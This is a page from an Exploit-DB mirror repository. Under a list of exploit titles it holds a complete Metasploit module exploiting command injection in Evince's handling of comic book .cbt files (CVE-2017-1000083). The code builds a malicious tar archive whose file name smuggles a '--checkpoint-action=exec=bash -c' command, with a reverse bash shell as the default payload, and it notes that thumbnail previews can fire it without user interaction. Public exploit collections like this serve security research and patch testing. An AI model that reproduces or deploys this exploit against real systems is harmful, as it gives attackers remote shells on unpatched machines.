bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/46341.rb
Offensive Security d622832ea0 DB: 2019-02-12 
21 changes to exploits/shellcodes

KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC)
KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)

Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)
Jzip -  Buffer Overflow (PoC) (SEH Unicode)
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC)
Mediacoder 0.8.33 build 5680 - '.m3u'  Buffer Overflow (PoC) (SEH Overwrite)
Mediacoder 0.8.33 build 5680 - '.lst'  Buffer Overflow (PoC) (SEH Overwrite)

STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC)
STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite)

Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)
Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH)

Netatalk 3.1.12 - Authentication Bypass (PoC)
IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)
Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)
IP-Tools 2.50 - Local Buffer Overflow (PoC)
Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite)

FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC)
FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite)

Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)
Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite)
AirDroid 4.2.1.6 - Denial of Service
FutureDj Pro 1.7.2.0 - Denial of Service
NordVPN 6.19.6 - Denial of Service (PoC)
River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)
IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)
River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)
Evince - CBT File Command Injection (Metasploit)
Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure

Netatalk - Bypass Authentication
Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)
NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)
Indusoft Web Studio 8.1 SP2 - Remote Code Execution
Smoothwall Express 3.1-SP4 - Cross-Site Scripting
Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset
IPFire 2.21 - Cross-Site Scripting
MyBB Bans List 1.0 - Cross-Site Scripting
VA MAX 8.3.4 - Authenticated Remote Code Execution
CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting
Webiness Inventory 2.3 - 'email' SQL Injection
2019-02-12 05:01:49 +00:00

108 lines
No EOL
3.8 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Evince CBT File Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Evince
before version 3.24.1 when opening comic book `.cbt` files.
Some file manager software, such as Nautilus and Atril, may allow
automatic exploitation without user interaction due to thumbnailer
preview functionality.
Note that limited space is available for the payload (<256 bytes).
Reverse Bash and Reverse Netcat payloads should be sufficiently small.
This module has been tested successfully on evince versions:
3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;
3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Felix Wilhelm', # Discovery
'Sebastian Krahmer', # PoC
'Matlink', # Exploit
'bcoles' # Metasploit
],
'References' =>
[
['BID', '99597'],
['CVE', '2017-1000083'],
['EDB', '45824'],
['URL', 'https://seclists.org/oss-sec/2017/q3/128'],
['URL', 'https://bugzilla.gnome.org/show_bug.cgi?id=784630'],
['URL', 'https://bugzilla.suse.com/show_bug.cgi?id=1046856'],
['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418'],
['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662'],
['URL', 'https://access.redhat.com/security/cve/cve-2017-1000083'],
['URL', 'https://security-tracker.debian.org/tracker/CVE-2017-1000083']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 215,
'BadChars' => "\x00\x0a\x0d\x22",
'DisableNops' => true
},
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_bash',
'DisablePayloadHandler' => true
},
'Targets' => [[ 'Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => '2017-07-13',
'DefaultTarget' => 0))
register_options([
OptString.new('FILENAME', [true, 'The cbt document file name', 'msf.cbt'])
])
end
def exploit
ext = %w[png jpg gif]
path = " --checkpoint-action=exec=bash -c \"#{payload.encoded};\".#{ext.sample}"
# Tar archive max path length is 256.
if path.length > 256
fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters"
end
# Tar archive max file name length is 100.
path.split('/').each do |fname|
if fname.length > 100
fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters"
end
end
# Create malicious tar archive
tarfile = StringIO.new
Rex::Tar::Writer.new tarfile do |tar|
tar.add_file path, 0644 do |io|
io.write ''
end
# Pad file to 1+ MB to trigger tar checkpoint action
tar.add_file rand_text_alphanumeric(10..20), 0644 do |io|
io.write rand_text(1_000_000..1_100_000)
end
end
tarfile.rewind
cbt = tarfile.read
print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
file_create cbt
end
end
Reference in a new issue View git blame Copy permalink